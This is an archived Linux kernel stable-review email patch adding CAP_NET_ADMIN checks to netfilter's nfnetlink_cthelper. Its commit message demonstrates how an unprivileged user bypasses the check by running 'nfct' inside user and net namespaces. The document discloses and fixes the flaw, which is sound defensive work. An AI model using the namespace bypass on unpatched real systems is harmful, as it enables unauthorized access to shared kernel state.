From mboxrd@z Thu Jan 1 00:00:00 1970 Return-Path: X-Google-Smtp-Source: AH8x224PrfBWeWShmjnWUXWHCaP82ICvnRMu/0CiBKYzDGHhH2vOt53XP/k43U0OGwgGH7bWxGMp ARC-Seal: i=1; a=rsa-sha256; t=1517256264; cv=none; d=google.com; s=arc-20160816; b=A0BCJqbkdiCiyypHur6U1UMdLAq0JKs++9qhO7qnIotqkornyVpE1xNHQA+pm3n1N+ cboK/gAH0zUkMRX4llnHgg6vPABkqdo4coguDK22La7HsWUdffHUz9DgokKoVov+WKYq UfD0g0JtGmd7e070WwkUSvc4LaaFDTcjPjgxSeMuik/DTDBYNoiGSpNnBpuTZhjpfPKG XJyw8aLwZE+VR1j8/10wh//H6YW6DSn0SIWHCP2tuNiIneBNXsnqEHRWs4eGZrLh9+H+ 4JPM+kEW3/0namaBLAGf+AmXJWMyIc8qZHsojavWxX5aG/9o101lRvfEjHoV+3WG9BnJ ixBA== ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816; h=mime-version:user-agent:references:in-reply-to:message-id:date :subject:cc:to:from:arc-authentication-results; bh=GJWElO+YBJ5cu1k5rZzb/cccF2RimI6VL7ZJBJ2hhl4=; b=dbt4My9n/J4bkT0rlzi6bs+0r8XKPBhuTvYcwFVdJD1vmZDoqNJKFbpsm0oEPvL9gK 3amovy37TI5CAqYhT6+MmkPtS+gFZPBeMvgtOoijF3bkrN9dP2UoQqeVpT6Qd+pE49zO LvqY8dnlurcNR9JXtkZBw7LS9dM/xFcrJFKEH/vZ8+tgTee9km2Lm1X2W1whUJYhguLy WHgd31P4HMPioh9d+X5zPKlGGQBP5bNV8L10og2nh8BwdOQk7V5KAYCSAYlk6Uj7GJG2 BuVZvAQ/JZgKAcSxbvWRhB9l8AsZGKWz/KzdyZE73DN7Sryw5rDCMd5vlM/MIkvSrGJ7 taqg== ARC-Authentication-Results: i=1; mx.google.com; spf=softfail (google.com: domain of transitioning gregkh@linuxfoundation.org does not designate 90.92.71.90 as permitted sender) smtp.mailfrom=gregkh@linuxfoundation.org Authentication-Results: mx.google.com; spf=softfail (google.com: domain of transitioning gregkh@linuxfoundation.org does not designate 90.92.71.90 as permitted sender) smtp.mailfrom=gregkh@linuxfoundation.org From: Greg Kroah-Hartman To: linux-kernel@vger.kernel.org Cc: Greg Kroah-Hartman , stable@vger.kernel.org, Kevin Cernekee , Pablo Neira Ayuso , Michal Kubecek Subject: [PATCH 4.4 39/74] netfilter: nfnetlink_cthelper: Add missing permission checks Date: Mon, 29 Jan 2018 13:56:44 +0100 Message-Id: <20180129123849.348697817@linuxfoundation.org> X-Mailer: git-send-email 2.16.1 In-Reply-To: <20180129123847.507563674@linuxfoundation.org> References: <20180129123847.507563674@linuxfoundation.org> User-Agent: quilt/0.65 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 X-getmail-retrieved-from-mailbox: INBOX X-GMAIL-LABELS: =?utf-8?b?IlxcU2VudCI=?= X-GMAIL-THRID: =?utf-8?q?1590958485788856390?= X-GMAIL-MSGID: =?utf-8?q?1590958505290528966?= X-Mailing-List: linux-kernel@vger.kernel.org List-ID: 4.4-stable review patch. If anyone has any objections, please let me know. ------------------ From: Kevin Cernekee commit 4b380c42f7d00a395feede754f0bc2292eebe6e5 upstream. The capability check in nfnetlink_rcv() verifies that the caller has CAP_NET_ADMIN in the namespace that "owns" the netlink socket. However, nfnl_cthelper_list is shared by all net namespaces on the system. An unprivileged user can create user and net namespaces in which he holds CAP_NET_ADMIN to bypass the netlink_net_capable() check: $ nfct helper list nfct v1.4.4: netlink error: Operation not permitted $ vpnns -- nfct helper list { .name = ftp, .queuenum = 0, .l3protonum = 2, .l4protonum = 6, .priv_data_len = 24, .status = enabled, }; Add capable() checks in nfnetlink_cthelper, as this is cleaner than trying to generalize the solution. Signed-off-by: Kevin Cernekee Signed-off-by: Pablo Neira Ayuso Acked-by: Michal Kubecek Signed-off-by: Greg Kroah-Hartman --- net/netfilter/nfnetlink_cthelper.c | 10 ++++++++++ 1 file changed, 10 insertions(+) --- a/net/netfilter/nfnetlink_cthelper.c +++ b/net/netfilter/nfnetlink_cthelper.c @@ -17,6 +17,7 @@ #include #include #include +#include #include #include @@ -392,6 +393,9 @@ nfnl_cthelper_new(struct sock *nfnl, str struct nfnl_cthelper *nlcth; int ret = 0; + if (!capable(CAP_NET_ADMIN)) + return -EPERM; + if (!tb[NFCTH_NAME] || !tb[NFCTH_TUPLE]) return -EINVAL; @@ -595,6 +599,9 @@ nfnl_cthelper_get(struct sock *nfnl, str struct nfnl_cthelper *nlcth; bool tuple_set = false; + if (!capable(CAP_NET_ADMIN)) + return -EPERM; + if (nlh->nlmsg_flags & NLM_F_DUMP) { struct netlink_dump_control c = { .dump = nfnl_cthelper_dump_table, @@ -661,6 +668,9 @@ nfnl_cthelper_del(struct sock *nfnl, str struct nfnl_cthelper *nlcth, *n; int j = 0, ret; + if (!capable(CAP_NET_ADMIN)) + return -EPERM; + if (tb[NFCTH_NAME]) helper_name = nla_data(tb[NFCTH_NAME]);